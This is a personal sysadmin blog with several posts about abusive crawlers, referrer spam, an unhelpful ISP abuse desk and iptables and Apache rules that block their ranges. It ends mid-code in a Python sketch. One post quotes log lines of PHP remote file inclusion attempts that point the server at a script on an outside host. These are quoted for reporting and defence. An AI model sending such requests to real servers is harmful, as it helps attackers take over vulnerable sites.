electro acoustic expressionism
nodepet
January 16th, 2009

bigfinder – another perfect match for the filters

Filed under: Web — olliver @ 12:07 h

One would think a search engine that advertises paid listings to website owners has a vital interest in not becoming a nuisance to webmasters. Any form of black hat SEO directed at those potential customers should backfire immediately. And if someone does opt for black hat SEO, one would expect them to do it properly so as not to endanger their source of income. Neither can be said of an outfit calling itself bigfinder.de, which was hitting my blog this morning from an IP range I must have overlooked (probably because no abuse of any kind had originated from there before). Anyway, time to put up some evidence from the logfiles:

83.133.125.202 - - [16/Jan/2009:06:18:34 +0100] www.nodepet.com "GET / HTTP/1.0" 200 42235 "-" "-"
83.133.125.202 - - [16/Jan/2009:06:18:35 +0100] www.nodepet.com "GET / HTTP/1.0" 200 42235 "-" "-"
83.133.125.202 - - [16/Jan/2009:06:18:41 +0100] www.nodepet.com "GET / HTTP/1.1" 200 42235 "http://www.BigFinder.de/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de)"
83.133.125.202 - - [16/Jan/2009:06:18:41 +0100] www.nodepet.com "GET / HTTP/1.0" 200 42235 "-" "-"
83.133.125.202 - - [16/Jan/2009:06:18:42 +0100] www.nodepet.com "GET / HTTP/1.0" 200 17642 "-" "-"
83.133.125.202 - - [16/Jan/2009:07:00:39 +0100] www.nodepet.com "GET / HTTP/1.1" 200 17642 "http://www.bigfinder.de/index.php" "T-Online Browser (Windows NT 5.1; U; de)"
83.133.125.202 - - [16/Jan/2009:08:04:08 +0100] www.nodepet.com "GET / HTTP/1.1" 200 17642 "http://www.bigfinder.de/index.php" "Mozilla/3.01 (compatible;)"

As you can see, the bot does not request robots.txt, keeps changing its user agent string and leaves fake referrers pointing at bigfinder.de. To me, this looks like referrer spam with badly falsified browser strings, with the advertised site sitting on the same address as the bot:

olliver@bunkiten:~$ host www.bigfinder.de
www.bigfinder.de has address 83.133.125.202
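The three symptoms named above (no robots.txt request, changing user agents, self-promoting referrers) can be pulled out of a logfile automatically. The following is only a minimal sketch: it assumes the log layout of the excerpt (combined format with the virtual host after the timestamp), and the names LINE, summarize and SAMPLE are made up for this illustration.

```python
import re
from collections import defaultdict

# Assumed layout: combined log format with the vhost after the timestamp.
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] (?P<vhost>\S+) '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referrer>[^"]*)" "(?P<agent>[^"]*)"'
)

def summarize(lines):
    """Group requests by client IP and collect agents, referrers and robots.txt use."""
    clients = defaultdict(lambda: {"agents": set(), "referrers": set(),
                                   "robots_txt": False, "requests": 0})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed layout
        c = clients[m["ip"]]
        c["requests"] += 1
        c["agents"].add(m["agent"])
        c["referrers"].add(m["referrer"].lower())
        if m["path"] == "/robots.txt":
            c["robots_txt"] = True
    return dict(clients)

# Four of the lines quoted above, with plain ASCII quotes.
SAMPLE = [
    '83.133.125.202 - - [16/Jan/2009:06:18:34 +0100] www.nodepet.com "GET / HTTP/1.0" 200 42235 "-" "-"',
    '83.133.125.202 - - [16/Jan/2009:06:18:41 +0100] www.nodepet.com "GET / HTTP/1.1" 200 42235 "http://www.BigFinder.de/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de)"',
    '83.133.125.202 - - [16/Jan/2009:07:00:39 +0100] www.nodepet.com "GET / HTTP/1.1" 200 17642 "http://www.bigfinder.de/index.php" "T-Online Browser (Windows NT 5.1; U; de)"',
    '83.133.125.202 - - [16/Jan/2009:08:04:08 +0100] www.nodepet.com "GET / HTTP/1.1" 200 17642 "http://www.bigfinder.de/index.php" "Mozilla/3.01 (compatible;)"',
]

report = summarize(SAMPLE)["83.133.125.202"]
print(len(report["agents"]), report["robots_txt"], sorted(report["referrers"]))
```

A single address that shows up with several unrelated user agents and never asks for robots.txt is a reasonable candidate for a closer look, though the thresholds are a matter of taste.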

So who are bigfinder.de and what is their mission? According to http://www.bigfinder.de/ueber.php some firm called projectnet run by Gert Kambartel is behind this operation. Their goals look quite interesting (as in peculiar):

Vorbei sind die Zeiten der “Ranking-Olympiaden” !!!

Bei BigFinder.de gibt es kein Ranking mehr. Hier hat jeder Eintrag die gleiche Chance, gefunden zu werden. Die Einträge werden gemäß der eingegebenen Suchworte per Zufall ermittelt. Das heißt, daß keine Einträge mehr für “ewig” auf den vordersten Plätzen stehen. Jeder Eintrag wird statistisch gesehen genau so oft angezeigt, wie die anderen, egal, wie “groß” oder wie “bekannt” eine Seite ist.

(source: http://www.bigfinder.de/ueber.php)

This translates to:

Gone are the days of “ranking olympics” !!!
At BigFinder.de there is no ranking any more. Here, each entry has the same chance of being found. Entries are picked at random from those matching the search terms entered. That means no entry stays in the top positions “forever” any more. Statistically speaking, each entry is displayed exactly as often as the others, no matter how “big” or how “well known” a site is.

The notion I dislike is that some elite is hogging the search engines and that this is the only reason some sites cannot be found. It also presupposes that every site is equally relevant to a search query, which is of course far from reality. Quite unsurprisingly, under http://www.bigfinder.de/mieten1.php you can find the bait for a guaranteed listing:

Können Sie sich vorstellen, in der größten und bekanntesten Suchmaschine auf Platz 1, 2 oder 3 zu stehen? Sie würden eine ungeahnte Menge an Besuchern auf Ihre Webseite bekommen. Davon träumen mit Sicherheit Millionen von Webseitenbetreibern, die alle etwas auf ihrer Webseite anzubieten haben.

(source: http://www.bigfinder.de/mieten1.php)

translation:

Can you imagine being listed in first, second or third position in the largest and best-known search engine? You would get an undreamt-of number of visitors to your website. Millions of website owners, all of whom have something to offer on their sites, surely dream of this.

Obviously, this is based on the notion that a top ranking for any keyword results in a lot of traffic. In reality, high traffic only comes with top positions for highly competitive terms, and even that does not automatically mean a high conversion rate for commercial websites. And there lies the core of the problem: ultimately it is the website and its content that matter.

And finally:

Und genau so funktioniert die Top-Positionierung bei BigFinder.de.
Sie mieten einen oder mehrere für Sie wichtige Suchbegriffe für je 10,00 EUR/Jahr (zuzgl. 19,00 % MwSt.)! Jedesmal, wenn dann ein User nach diesem Begriff sucht, erscheint Ihre Webseite auf einem der Plätze 1-3 in der Trefferliste.

(source: http://www.bigfinder.de/mieten1.php)

translation:

And this is exactly how top positioning at BigFinder.de works.
You rent one or more search terms that matter to you for EUR 10.00 per year each (plus 19.00 % VAT)! Each time a user then searches for this term, your website appears in one of positions 1-3 of the results list.

To summarize, bigfinder.de wants to make people believe that sponsored and organic search results are identical and that top rankings in any search engine automatically result in lots of traffic. There is also the implication that every site is of the same quality and can convert traffic to sales equally well. To me, this is clearly aimed at gullible folks with little knowledge of how the web actually works. Furthermore, there is a financial incentive for this “search engine” to leave phony marks in webmasters’ server logs.

Looking more closely, I wonder why the search engine has to prominently display the number of domains and the supposed number of concurrent visitors on its pages:

13.491.148 Domains, 169 Besucher online

(this is what it claimed at 10:38 h CET)

Combine this with the hourly fake visits and you cannot exclude the possibility that someone is trying to artificially inflate their relevance by means of fake numbers and visitors. This is something regulars of a major SEO forum in Germany have been wondering about for a while, too:

I once contacted this guy via email. This guy was snotty and proud of his peculiar site.

I sent him a list of prohibited sites. Since then, I no longer received “pseudo requests”.

translation by me, original source: BigFinder replaces OttoSuch (in German only)

Hello,
I own a homepage and noticed in my web statistics that some visitors originated from bigfinder.de. I then went to their site and rented several keywords for 10 Euros a year.

Now there are more “visitors” who reach my homepage via BigFinder. However, I suspect that BigFinder’s clicks on my site are automatically generated.

Not a single customer came to me this way. Via Google there are several regularly. I assume that this is technically feasible without any effort. But does anyone of you know more about that? Do other users suspect manipulation, too?

Does anyone know anything helpful about it?

translation by me, original source: Bigfinder Search Engine (in German only)

As I wrote in my introduction: if this really is a scam, it would be rather silly to have all requests originate from the same IP address as the official website and to use badly faked browser strings. On the other hand, there is still a huge market of technically challenged and gullible webmasters who might end up paying the rent without getting anything in return. However, I don’t know whether it is a scam. There is merely some evidence suggesting that this search engine is intentionally planting fake referrers, and there is a financial incentive for doing so. Additionally, there seems to be some kind of consensus that this engine does not produce real human visits, but even this might be the result of a biased sample.

What I do know, however, is that this bot exhibits unacceptable behaviour, and as it does not obey robots.txt there is no way to opt out other than denying access to one’s website (or entire server).

Whois suggests the following about the ip range:

inetnum: 83.133.96.0 - 83.133.127.255
netname: LNCDE-GREATNET-NEWMEDIA
descr: Greatnet New Media.
country: DE
admin-c: FL1331-RIPE
tech-c: FL1331-RIPE
status: ASSIGNED PA
mnt-by: LNC-MNT
mnt-lower: LNC-MNT
source: RIPE # Filtered

person: Frazzetta Lindner
address: Greatnet New Media
address: Brentenstrasse 4a
address: D-83734 Hausham
address: Germany
phone: +49 1805 47328638
fax-no: +49 1805 444894696
nic-hdl: FL1331-RIPE
abuse-mailbox: abuse at greatnet.de
mnt-by: LNC-MNT
source: RIPE # Filtered

Greatnet is a German hosting outfit offering everything from websites to colocation, so they are safe to block without accidentally locking out human visitors. Plus you never know whether at some point in the future scrapers or web spammers will make this place their home and so the best prevention is to block first and make exceptions later.

Apache users on shared hosting may like to add

Deny from 83.133.96.0/19

to .htaccess or httpd.conf

Dedicated server owners may instead prefer to get rid of the noise altogether:

iptables -A INPUT -s 83.133.96.0/19 -i eth0 -p tcp -m tcp --syn -j REJECT

or the BOfH variant:

iptables -A INPUT -s 83.133.96.0/19 -i eth0 -j DROP
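Turning an inetnum range from whois into the CIDR notation used in these rules is easy to get wrong by hand. As a small sketch, Python's standard ipaddress module can do the conversion; the helper name range_to_cidr is made up for this example.

```python
import ipaddress

def range_to_cidr(first, last):
    """Return the CIDR blocks that exactly cover first..last (inclusive)."""
    start = ipaddress.ip_address(first)
    end = ipaddress.ip_address(last)
    return [str(net) for net in ipaddress.summarize_address_range(start, end)]

# The inetnum range from the whois output above
print(range_to_cidr("83.133.96.0", "83.133.127.255"))  # ['83.133.96.0/19']
```

If a range does not fall on a clean boundary, the function returns several blocks, each of which would need its own rule.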


December 28th, 2008

Sphere adding query strings to search results

Filed under: Web — olliver @ 22:58 h

During my usual daily administrative tasks, I was less than pleased to discover that someone at Sphere apparently came up with a new idea. Or perhaps that idea has been around for quite a long time and I was merely fortunate enough to have been spared from learning of its existence. For those who do not know what I am referring to, here is a short explanation:

Sphere offer a widget for blogs that tries to present related blogposts for a particular subject. Perhaps not a bad idea in itself, maybe even a boon to those who want to research a subject and have a handy tool to consult more than one source prior to adding their own thoughts. However there seem to be some issues:
A referer=sphere_search query string is appended to these links. Even worse, it seems that other search engines are encouraged to crawl these modified links. As a search engine bot cannot differentiate between a useless query string and one that has been added on purpose, it will treat the original and the modified link as two separate pages showing the same content, and ultimately this can lead to the receiving end being hit by dreaded duplicate content penalties.

Google demonstrates that quite a few sites now have to put up with indexed pages they never wanted to have this way:
http://www.google.com/search?q=inurl:referer=sphere_search

This pretty much looks to me like some marketing expert had the brilliant idea of introducing the referrer tracking model of the adult content industry to the mainstream without the affected webmasters’ consent. If you have been hit by this nonsense too, you can easily spot it in your logfiles, like I did this morning:

66.249.73.232 - - [28/Dec/2008:11:18:13 +0100] "GET /goals-for-2008-revisited?referer=sphere_search HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.232 - - [28/Dec/2008:11:18:14 +0100] "GET /goals-for-2008-revisited/?referer=sphere_search HTTP/1.1" 200 11189 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

You may notice that the first request omitted the trailing slash of the URI, a bad habit Sphere’s bot has been exhibiting for years without anyone bothering to fix it. Now the hassle of addressing these malformed requests in order to limit the damage they can do has been added to the mix. Apache users may like to use a mod_rewrite rule similar to this to work around the problem:

# broken sphere search: strip the tracking query string, keep exactly one trailing slash
RewriteCond %{QUERY_STRING} .
RewriteCond %{QUERY_STRING} ^referer=sphere [NC]
RewriteRule ^/?(.*?)/?$ http://www.example.com/$1/? [R=301,L]

I assume you know how to use mod_rewrite. In case you don’t, please read up on the basics before using this code, as using it without understanding the implications can wreak havoc on a server. Here is a brief explanation of what it does:

First it checks whether a query string is present and, if so, whether it begins with “referer=sphere”. If it does, a 301 redirect is forced that strips the query string and re-adds the omitted terminal slash of our fake directory path. The stripping is done by the question mark appended at the end of the substitution URL. Now, when disaster has struck one of our pages, bots can be led to the actual source no matter what rubbish was originally picked up.
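To make the intended outcome of the redirect easier to check, here is the same logic as a small Python model. It is not how Apache works internally, merely a sketch of what should come out at the other end; the function name canonical_url is invented for this example.

```python
from urllib.parse import urlsplit, urlunsplit

def canonical_url(url):
    """Return the redirect target for a Sphere-tagged URL, or None if no redirect applies."""
    parts = urlsplit(url)
    if not parts.query.lower().startswith("referer=sphere"):
        return None  # query string absent or unrelated: leave the request alone
    path = parts.path.rstrip("/") + "/"  # end the path with exactly one slash
    return urlunsplit((parts.scheme, parts.netloc, path, "", ""))  # drop the query string

print(canonical_url("http://www.example.com/goals-for-2008-revisited?referer=sphere_search"))
```

Both variants from the log excerpt, with and without the trailing slash, should end up at the same address, which is the whole point of the exercise.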

Of course this is merely curing symptoms. The source of the problem is this moronic addition of a query string which can only be fixed by Sphere. Surely I’m not the only one on this planet who feels annoyed by such nonsensical additions and perhaps in the end you can only opt out from their crawling:

The responsible outfit is located in this little corner of the web:

Votenet Solutions Inc, SAVV-S234898-5 (NET-64-14-117-224-1)
64.14.117.224 - 64.14.117.255

which equates to 64.14.117.224/27.

Opting out can be done in several ways:
One may add an entry to robots.txt, another to .htaccess or httpd.conf (depending on shared/dedicated hosting) and freaks like me prefer using iptables, so they need not see the clutter of failed requests in their logfiles:

# sphere.com: broken link generation
iptables -A INPUT -s 64.14.117.224/27 -i eth0 -j DROP

That should put an end to the affiliate link mess.


December 8th, 2008

Logical.net – abuse reports discouraged

Filed under: Web — olliver @ 13:50 h

I merely meant to be helpful when I took the time to notify logical.net of a compromised server, possibly running an unpatched cPanel version, that was hitting one of the servers I administer with PHP remote file inclusion attempts:

209.23.116.97 - - [08/Dec/2008:11:55:28 +0100] "GET //admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 403 217 "-" "Mozilla/5.0"
209.23.116.97 - - [08/Dec/2008:11:55:28 +0100] "GET /category//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 403 227 "-" "Mozilla/5.0"
209.23.116.97 - - [08/Dec/2008:11:55:28 +0100] "GET /category/spam/%20%20//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 403 235 "-" "Mozilla/5.0"
209.23.116.97 - - [08/Dec/2008:11:55:31 +0100] "GET /category/spam//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 403 232 "-" "Mozilla/5.0"
209.23.116.97 - - [08/Dec/2008:11:56:17 +0100] "GET /failed-blogspam-automation-from-china//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 403 256 "-" "Mozilla/5.0"
209.23.116.97 - - [08/Dec/2008:11:56:17 +0100] "GET /failed-blogspam-automation-from-china/%20%20//admin/index.php?o=http://truckmobile.pl//assets/snippets/reflect/idxx.txt?? HTTP/1.1" 403 259 "-" "Mozilla/5.0"

209.23.116.97 has a PTR record of cpanel.acmenet.net, which looks quite telling in my opinion.

When looking up the address, I noticed that Logical Net does not differentiate between ranges for end-user Internet access and web hosting, so unless you scan PTR records you have no way of telling them apart. There is just one block for everything:

OrgName: Logical Net Corporation
OrgID: LNC
Address: 1593 Central Ave.
City: Albany
StateProv: NY
PostalCode: 12205
Country: US

NetRange: 209.23.0.0 - 209.23.127.255
CIDR: 209.23.0.0/17
NetName: LNET-A
NetHandle: NET-209-23-0-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.LOGICAL.NET
NameServer: NS2.LOGICAL.NET
NameServer: NS3.LOGICAL.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 1999-03-12
Updated: 2001-05-30

Nor could their routing give any more hints (sometimes it does):

route: 209.23.0.0/17
origin: AS3931
descr: LOGICAL - Logical Net Corporation
lastupd-frst: 2008-11-14 00:00Z 80.81.192.106@rrc12
lastupd-last: 2008-12-08 03:29Z 145.125.80.5@rrc00
seen-at: rrc00,rrc01,rrc04,rrc05,rrc06,rrc07,rrc10,rrc11,rrc12,rrc13,rrc14,rrc15,rrc16
num-rispeers: 96
source: RISWHOIS

According to whois, they at least have an abuse address, and one is tempted to think it was added for a reason other than looking “anti-spam”. As I had to discover right after sending my abuse report, this does not seem to be the case with logical.net. Here is the automated ignore-bot reply I instantly received from them:

From: “Support” <support @ logical.net>
To: [some address]@gmail.com
Reply-To: support @ logical.net
Subject: Registration Required: Unable to create Ticket
Date: Mon, 08 Dec 2008 06:48:35 -0500
X-Mailer: Kayako eSupport v3.20.02

Your ticket has not been accepted into the system. You are required to register at the following URL to submit any issues via Email: help.logical.net/index.php?_m=core&_a=register If you already have a registered account under a different email address you may log into our ticketing system Here: http://help.logical.net/

Once registered, you will be able to submit any issues directly by sending us Email. We are sorry for any inconvenience this may have caused.

Support

Note that I wrote to abuse and got a reply from support instead. However, I did not ask for their help, as I already know how to adjust my defences in order to rid myself of negligent, ignorant or even malicious network owners. I merely sent out a courtesy notice as I figured a compromised cPanel may be some kind of disaster for those who maintain their servers/domains with it. But apparently I was mistaken. Do Logical.net really believe they are so special that I would happily jump through their hoops just to notify them of their own negligence (notice the absurdity)? I can’t believe anyone in their right mind would cherish such a crazy notion, therefore I conclude that third party notifications are not desired by logical.net, which is their right (aka their network, their rules). As it is mine to refuse traffic coming from their direction.

How can I block them from accessing my webservers without affecting innocent dial-up or DSL users? I spent some time looking up PTR records and noticed that the /24 containing the compromised machine is exclusively populated by servers, mainly mailservers, but some webservers, too. The same applies to the neighbouring /24, so I resolved the problem by adding the following entry to both my mail- and webservers:

# logical.net do not wish to receive abuse reports
iptables -A INPUT -s 209.23.116.0/23 -i eth0 -p tcp -m tcp --syn -j REJECT
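Before loading such a rule it does not hurt to double-check which addresses the /23 actually covers. A minimal sketch with Python's ipaddress module follows; BLOCKED and is_blocked are names invented for this illustration.

```python
import ipaddress

# The range from the rule above; further networks could be appended to the list.
BLOCKED = [ipaddress.ip_network("209.23.116.0/23")]

def is_blocked(addr, networks=BLOCKED):
    """True if addr lies inside any of the given networks."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in networks)

print(is_blocked("209.23.116.97"))   # the compromised machine
print(is_blocked("209.23.118.1"))    # just outside the two /24s
```

The first call should report True and the second False, confirming that only the two server-populated /24s are affected.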

This way, if one of their mailservers should suddenly start spewing spam, I have the peace of mind of not being confronted with it. Or think of a moronic implementation of some autoresponder or challenge/response system which could be abused by spammers for hitting innocent bystanders with tons of backscatter.


September 30th, 2008

dotbot – yet another useless robot…

Filed under: Web — olliver @ 10:36 h

Allow me to start with a question: What is the purpose of a legitimate robot? One would think it is fetching content at a reasonable pace whilst respecting the host’s restrictions in robots.txt. When a bot bothers to fetch robots.txt prior to its crawling, does that signify it will also process its rules? Not necessarily it seems. When Dotbot visited me two days ago, it did not seem to be interested in my content, but in collecting redirect messages without following them:

208.115.111.245 - - [28/Sep/2008:08:53:50 +0200] "GET /robots.txt HTTP/1.1" 200 77 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.245 - - [28/Sep/2008:08:58:00 +0200] "GET /category/life HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.245 - - [28/Sep/2008:08:58:04 +0200] "GET /category/music HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.245 - - [28/Sep/2008:08:58:08 +0200] "GET /category/photo HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.245 - - [28/Sep/2008:08:58:13 +0200] "GET /category/spam HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.245 - - [28/Sep/2008:08:58:18 +0200] "GET /category/web HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"

This is just a small but representative sample: For reasons unknown to me the Dotbot omits the terminal slash of the URI which results in a 301 redirect (because there is no file of that name). Now if only the spider followed it, so that it could fetch something meaningful. To cut a long story short, except for robots.txt, there was not a single article this bot took home, because the robot obviously does not know how to handle redirects. Quite a silly waste of resources in my opinion, but then again, what do I know about the bot’s purpose?

On the DotNetDotCom website, the crawler’s presumable home, we can find the following statement:

Hi! Thanks for letting us crawl you!

We are just a few Seattle based guys trying to figure out how to make internet data as open as possible. You should be able to find everything you are looking for below. If not feel free to contact us. Happy Surfing!

The “we are just …” statement does not inspire much confidence in me. This impression is reinforced by the next paragraph, which contains instructions on how to get rid of the bot:

1. First and foremost, curse our name. Trust us, it will feel good. Now breath gently…
2. Create a simple text file named robots.txt and place it in your server’s root directory. (http://www.yoursite.com/ «– Right There!)
3. Add the following code to your robots.txt file:
User-agent: dotbot
Disallow: /
4. Reflect on how easy that was.

To me this does not sound like a responsible operation, because it suggests that rather than fixing their bot, they urge “flamers” to opt-out from their crawling. Regulars will know I am one of these flamers ;-) and of course this is not the only reason for my scepticism:

208.115.111.245 - - [28/Sep/2008:11:13:52 +0200] "GET /robots.txt HTTP/1.1" 200 77 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.245 - - [28/Sep/2008:11:19:32 +0200] "GET /impressum HTTP/1.1" 301 241 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"

Impressum is explicitly excluded from crawling in robots.txt because it contains sensitive information about me that I am required to put up by German law. Yet, despite reading robots.txt, DotBot chose to jump right onto it. Fortunately, it again failed to add a trailing slash to its request and to handle the resulting 301 redirect properly. Ignoring robots.txt is usually a KO criterion for a bot, and since experience has proven time and again that bad bots have a tendency to morph, I prefer to firewall them right away.
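What a well-behaved crawler is supposed to do with robots.txt can be shown with Python's standard urllib.robotparser. Note that the rules below are hypothetical: the actual robots.txt of this blog is not reproduced in this post, so ROBOTS_TXT only assumes a single Disallow line for the Impressum. The helper name allowed is likewise made up.

```python
from urllib.robotparser import RobotFileParser

# Hypothetical rules; the blog's real robots.txt is not shown in the post.
ROBOTS_TXT = """\
User-agent: *
Disallow: /impressum
"""

def allowed(agent, path, robots_txt=ROBOTS_TXT):
    """Ask the parser whether the given agent may fetch the given path."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser.can_fetch(agent, path)

print(allowed("DotBot", "/impressum"))      # excluded, so a polite bot stays away
print(allowed("DotBot", "/category/web/"))  # not excluded, fine to fetch
```

A crawler that fetches robots.txt and then requests a path for which this check fails has either a broken parser or no intention of honouring the rules.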

Whois opines the following about their address space:

OrgName:    dotnetdotcom.org
OrgID:      DOTNE
Address:    93 S. Jackson Street #10070
City:       Seattle
StateProv:  WA
PostalCode: 98104-2818
Country:    US

NetRange:   208.115.111.240 - 208.115.111.255
CIDR:       208.115.111.240/28
OriginAS:   AS23033
NetName:    208-115-111-240-SLASH28
NetHandle:  NET-208-115-111-240-1
Parent:     NET-208-115-96-0-1
NetType:    Reassigned
Comment:
RegDate:    2008-07-21
Updated:    2008-07-21

I am not suggesting the DotNetDotCom owners are blackhats. But I have better things to do in my life than to debug other people’s bot operation. If DotBot fails even at elementary things like obeying robots.txt and following redirects, then I see no reason to allow it to visit my sites. Blocking 208.115.111.240/28 should take care of the problem.


June 29th, 2008

Who are behind WebDataCentreBot?

Filed under: Web — olliver @ 23:52 h

It does not pay to hold back on preemptively blocking ranges known to be occupied by popular hosting companies, unless you want to have fun with misbehaving or fake bots. My pleasure of meeting the WebDataCentreBot was rather accidental: I had been lazy about blocklisting the SoftLayer ranges so that they can do nothing but send mail to me or receive mail from me.

The bot was sitting on 67.228.177.87 and announced itself as:

Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)

Not only did it jump right in and start indexing without bothering in the slightest about robots.txt, it also happily fetched content that is explicitly excluded in robots.txt. But then again, how should it know without reading the file in the first place? Well, I thought perhaps they would want to learn about the broken behaviour of their bot and fix it, but looking at their site webdatacentre.com, all I can find is:

Web Data Centre

Web Data Centre is an internet research project driven by a small team of researchers from different parts of the world. Its aim is to get a better understanding of the link structure of the web. More info is coming shortly.

(front page as of June 29th 2008)

And that was it. No point of contact whatsoever and looking at the registration data, things turn out to look pretty spammy:

Domain Name: WEBDATACENTRE.COM

Registrant [1435225]:
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US

Administrative Contact [1435225]:
        Moniker Privacy Services WEBDATACENTRE.COM @ domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US
        Phone: +1.9549848445
        Fax:   +1.9549699155

Billing Contact [1435225]:
        Moniker Privacy Services WEBDATACENTRE.COM @ domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US
        Phone: +1.9549848445
        Fax:   +1.9549699155

Technical Contact [1435225]:
        Moniker Privacy Services WEBDATACENTRE.COM @ domainservice.com
        Moniker Privacy Services
        20 SW 27th Ave.
        Suite 201
        Pompano Beach
        FL
        33069
        US
        Phone: +1.9549848445
        Fax:   +1.9549699155

Domain servers in listed order:

        NS1.DOMAINSERVICE.COM         67.99.176.12
        NS2.DOMAINSERVICE.COM         67.97.247.209
        NS3.DOMAINSERVICE.COM         64.49.213.231
        NS4.DOMAINSERVICE.COM         67.97.247.210

        Record created on:        2008-06-27 05:46:23.0
        Database last updated on: 2008-06-27 05:46:39.373
        Domain Expires on:        2009-06-27 05:46:41.0

Registered a mere two days ago and hiding behind an anonymous privacy shield. Why would a business want to remain anonymous unless it has to conceal something? One also might expect a search engine to reveal its legitimacy by having a meaningful rDNS name that reflects the bot’s name, but nothing much to find here either:

olliver@bunkiten:~$ host 67.228.177.87
87.177.228.67.in-addr.arpa domain name pointer midphase.com.
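The same reverse lookup can be scripted. The sketch below builds the in-addr.arpa name with the ipaddress module and checks whether a PTR record ends in a suffix one would expect from the bot's operator. The suffix ".webdatacentre.com" is only an assumption of what a self-identifying record might look like, the function names are invented, and a thorough check would also resolve the name forward again, which is left out here.

```python
import ipaddress
import socket

def ptr_name(addr):
    """Name queried for a reverse lookup, e.g. 87.177.228.67.in-addr.arpa."""
    return ipaddress.ip_address(addr).reverse_pointer

def rdns_matches(addr, expected_suffix, lookup=socket.gethostbyaddr):
    """True if the PTR record of addr ends with expected_suffix.

    lookup is injectable so the check can be tried without network access.
    """
    try:
        hostname = lookup(addr)[0]
    except OSError:
        return False  # no PTR record at all (NXDOMAIN and friends)
    return hostname.rstrip(".").lower().endswith(expected_suffix.lower())

# Canned answer mirroring the host output above, so no DNS query is made here.
def canned_lookup(addr):
    return ("midphase.com", [], [addr])

print(ptr_name("67.228.177.87"))
print(rdns_matches("67.228.177.87", ".webdatacentre.com", lookup=canned_lookup))
```

With the real resolver left in place, the function performs an actual DNS query, so results will depend on whatever the PTR record says at that moment.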

Midphase.com is the generic PTR record of a Softlayer reseller:

%rwhois V-1.5:003fff:00 rwhois.softlayer.com (by Network Solutions, Inc. V-1.5.9.5)
network:Class-Name:network
network:ID:NETBLK-SOFTLAYER.67.228.160.0/19
network:Auth-Area:67.228.160.0/19
network:Network-Name:SOFTLAYER-67.228.160.0
network:IP-Network:67.228.177.0/24
network:IP-Network-Block:67.228.177.0-67.228.177.255
network:Organization;I:Hosting Services Inc.
network:Street-Address:223 West Jackson Blvd STE# 1014
network:City:Chicago
network:State:IL
network:Postal-Code:60606
network:Country-Code:US
network:Tech-Contact;I:sysadmins @ softlayer.com
network:Abuse-Contact;I:abuse @ midphase.com
network:Admin-Contact;I:IPADM258-ARIN
network:Created:20080128
network:Updated:20080324
network:Updated-By:ipadmin @ softlayer.com

An aggregated range of consecutive IP addresses registered to the bot-building outfit would seem more practical, especially for directing complaints to the appropriate persons. However, there is no information about the number of IP addresses in use by this anonymous entity, which effectively helps Midphase’s publicity-shy customers remain anonymous. Putting it all together, it seems more likely that they are spammers harvesting content, email addresses or web forms, building a list for themselves or to sell to other spammers, than an actual search engine. Even if I am entirely mistaken, I am still not particularly keen on bots that ignore established standards like robots.txt. Absent any communication channel, one has to conclude that one cannot opt out of their crawling by ordinary means.

Therefore, firewalling this particular range seems an appropriate solution to me:

iptables -A INPUT -s 67.228.177.0/24 -i eth0 -p tcp -m tcp ! --dport 25 --syn -j REJECT

This rule rejects all incoming TCP connection attempts except those to the SMTP port, as there may be legit sites we like to receive mail from or send mail to. We have to specify that only incoming SYN packets be rejected, because otherwise the replies to our outgoing mail connections would be rejected as well, and mail to this address range would remain stuck in our queue and never get delivered. If this potential need for communication is not something to worry about, one can still apply the BOfH method and drop the range altogether:

iptables -A INPUT -s 67.228.177.0/24 -i eth0 -j DROP
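Why the first, more selective rule lets mail flow in both directions becomes clearer when the match is written out. The following toy model covers only the decision logic, under the assumption that the source address already matched the range. The --syn option matches segments with SYN set and ACK, RST and FIN cleared. Segment, is_syn_only and rejected are names invented for this sketch.

```python
from dataclasses import dataclass

@dataclass
class Segment:
    dport: int          # destination port on our side
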